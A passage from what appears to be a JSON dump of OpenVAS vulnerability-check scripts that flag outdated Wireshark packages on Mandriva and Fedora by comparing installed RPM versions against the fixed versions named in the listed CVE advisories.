Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This advisory updates wireshark to the latest version(s), fixing\n several security issues:\n\n Buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through\n 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack\n vectors (CVE-2010-2284).\n \n Buffer overflow in the SigComp Universal Decompressor Virtual Machine\n dissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8\n has unknown impact and remote attack vectors (CVE-2010-2287).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-08/msg00000.php\");\n script_id(831120);\n script_version(\"$Revision: 8164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-06 10:34:50 +0200 (Fri, 06 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:144\");\n script_cve_id(\"CVE-2010-2284\", \"CVE-2010-2287\");\n script_name(\"Mandriva Update for wireshark MDVSA-2010:144 (wireshark)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.0.15~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.10~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.0.15~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:05:53", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-09-07T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2010-13427", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-1455", "CVE-2010-2992", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286", "CVE-2010-2993"], "modified": "2018-01-22T00:00:00", "id": "OPENVAS:1361412562310862360", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862360", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2010-13427\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 12\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-September/046962.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862360\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-07 07:38:40 +0200 (Tue, 07 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-13427\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2010-2995\", \"CVE-2010-1455\", \"CVE-2010-2992\", \"CVE-2010-2993\");\n script_name(\"Fedora Update for wireshark FEDORA-2010-13427\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.10~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:30", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-09-07T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2010-13427", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-1455", "CVE-2010-2992", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286", "CVE-2010-2993"], "modified": "2017-12-22T00:00:00", "id": "OPENVAS:862360", "href": "http://plugins.openvas.org/nasl.php?oid=862360", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2010-13427\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 12\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-September/046962.html\");\n script_id(862360);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-07 07:38:40 +0200 (Tue, 07 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-13427\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2010-2995\", \"CVE-2010-1455\", \"CVE-2010-2992\", \"CVE-2010-2993\");\n script_name(\"Fedora Update for wireshark FEDORA-2010-13427\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.10~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:50", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-06-20T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-7858", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2010-2284", "CVE-2010-2287", "CVE-2011-2175", "CVE-2011-1959", "CVE-2010-2283", "CVE-2010-2286", "CVE-2011-1957", "CVE-2011-1958"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863282", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863282", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-7858\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061477.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863282\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-20 08:37:08 +0200 (Mon, 20 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-7858\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2011-2175\", \"CVE-2011-2174\", \"CVE-2011-1959\", \"CVE-2011-1957\", \"CVE-2011-1958\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-7858\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC13\");\n script_tag(name:\"affected\", value:\"wireshark on Fedora 13\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.17~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:30", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2011-06-20T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-7858", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2010-2284", "CVE-2010-2287", "CVE-2011-2175", "CVE-2011-1959", "CVE-2010-2283", "CVE-2010-2286", "CVE-2011-1957", "CVE-2011-1958"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863282", "href": "http://plugins.openvas.org/nasl.php?oid=863282", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-7858\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 13\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061477.html\");\n script_id(863282);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-20 08:37:08 +0200 (Mon, 20 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-7858\");\n script_cve_id(\"CVE-2010-2287\", \"CVE-2010-2286\", \"CVE-2010-2284\", \"CVE-2010-2283\", \"CVE-2011-2175\", \"CVE-2011-2174\", \"CVE-2011-1959\", \"CVE-2011-1957\", \"CVE-2011-1958\");\n script_name(\"Fedora Update for wireshark FEDORA-2011-7858\");\n\n script_summary(\"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.17~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "Mandriva Update for wireshark MDVSA-2011:083 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1592", "CVE-2011-1590", "CVE-2011-1591"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831388", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831388", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for wireshark MDVSA-2011:083 (wireshark)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-05/msg00004.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831388\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"MDVSA\", value:\"2011:083\");\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\");\n script_name(\"Mandriva Update for wireshark MDVSA-2011:083 (wireshark)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1|2010\\.0)\");\n script_tag(name:\"affected\", value:\"wireshark on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"This advisory updates wireshark to the latest version (1.2.16),\n fixing several security issues:\n\n The X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x\n before 1.4.5 does not properly initialize certain global variables,\n which allows remote attackers to cause a denial of service (application\n crash) via a crafted .pcap file (CVE-2011-1590).\n\n Stack-based buffer overflow in the DECT dissector in\n epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows\n remote attackers to execute arbitrary code via a crafted .pcap file\n (CVE-2011-1591).\n\n The NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x\n before 1.4.5 on Windows uses an incorrect integer data type during\n decoding of SETCLIENTID calls, which allows remote attackers to cause\n a denial of service (application crash) via a crafted .pcap file\n (CVE-2011-1592).\n\n The updated packages have been upgraded to the latest 1.2.x version\n (1.2.16) which is not vulnerable to these issues.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.16~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.16~0.1mdvmes5.2\", 